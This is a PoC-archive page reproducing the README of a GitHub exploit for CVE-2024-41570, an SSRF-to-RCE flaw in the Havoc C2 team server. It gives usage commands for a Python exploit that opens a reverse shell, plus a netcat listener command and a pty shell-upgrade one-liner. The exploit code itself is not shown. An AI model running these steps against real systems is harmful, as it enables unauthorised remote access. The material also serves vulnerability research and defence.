Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1310 CNY

100%
Buy Us a Coffee

CVE-2024-41570 PoC — Havoc 安全漏洞

Source
https://github.com/diemoeve/CVE-2024-41570
Associated Vulnerability
Title:Havoc 安全漏洞 (CVE-2024-41570)
Description:An Unauthenticated Server-Side Request Forgery (SSRF) in demon callback handling in Havoc 2 0.7 allows attackers to send arbitrary network traffic originating from the team server.
Description
Automated Reverse Shell Exploit via WebSocket | Havoc-C2-SSRF with RCE
Readme
# CVE-2024-41570 | Havoc C2 SSRF with RCE | Automated Reverse Shell Exploit via WebSocket

This project provides a Python-based proof-of-concept (PoC) script to exploit a vulnerable WebSocket-based service. The script automates agent registration, WebSocket payload delivery, and remote command execution to establish a reverse shell.

## Features
- Registers an agent to the target service.
- Opens a WebSocket and sends handshake and authentication payloads.
- Executes commands remotely via a reverse shell.
- Provides a guided workflow with clear instructions.

## Prerequisites
- Python 3.x installed on your machine.
- Install required dependencies by running:
  ```bash
  pip install -r requirements.txt
  ```

## Installation
1. Clone this repository:
   ```bash
   git clone https://github.com/kit4py/CVE-2024-41570.git
   ```
2. Navigate to the project directory:
   ```bash
   cd CVE-2024-41570
   ```
3. Install dependencies:
   ```bash
   pip install -r requirements.txt
   ```

## Usage
Run the script with the required arguments:

```bash
python3 exploit.py -t <target_url> -i <teamserver_ip> -p <teamserver_port> -U <username> -P <password> -l <listener_ip> -L <listener_port>
```

### Arguments
- `-t`: Target URL of the WebSocket server.
- `-i`: IP address of the Team Server form Havoc.
- `-p`: Port for the Team Server from Havoc.
- `-U`: Username for WebSocket authentication.
- `-P`: Password for WebSocket authentication.
- `-l`: Listener IP for the reverse shell (your machine).
- `-L`: Listener port for the reverse shell (your machine).

### Example Command
```bash
python3 exploit.py -t http://example.com -i 127.0.0.1 -p 40056 -U 'havocuser' -P 'password123' -l 192.168.1.2 -L 4444
```

### Steps to Execute
1. Ensure the target service is running and vulnerable.
2. Run the script with the required parameters.
3. In a separate terminal, start a listener:
   ```bash
   nc -lvnp <listener_port>
   ```
4. Upgrade shell:
    ```
    python -c 'import pty; pty.spawn("/bin/bash")' 
    export TERM=xterm-256color
    stty rows 67 columns 318
    ```
## Dependencies
The script requires the following Python libraries:
- `requests`
- `pycryptodome`

Install them using the command:
```bash
pip install -r requirements.txt
```

## Security Notice
This script is intended for educational purposes only. Ensure you have explicit authorization to test the target system. Misuse of this script may violate laws and ethical guidelines.

## References
Inspired by [Default Havoc Poc](https://github.com/chebuya/Havoc-C2-SSRF-poc)

## Contributing
Contributions are welcome! Feel free to fork the repository and submit a pull request.

## License
This project is licensed under the MIT License. See the LICENSE file for details.
File Snapshot

Log in to view the POC file snapshot cached by Shenlong Bot

Log in to view
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →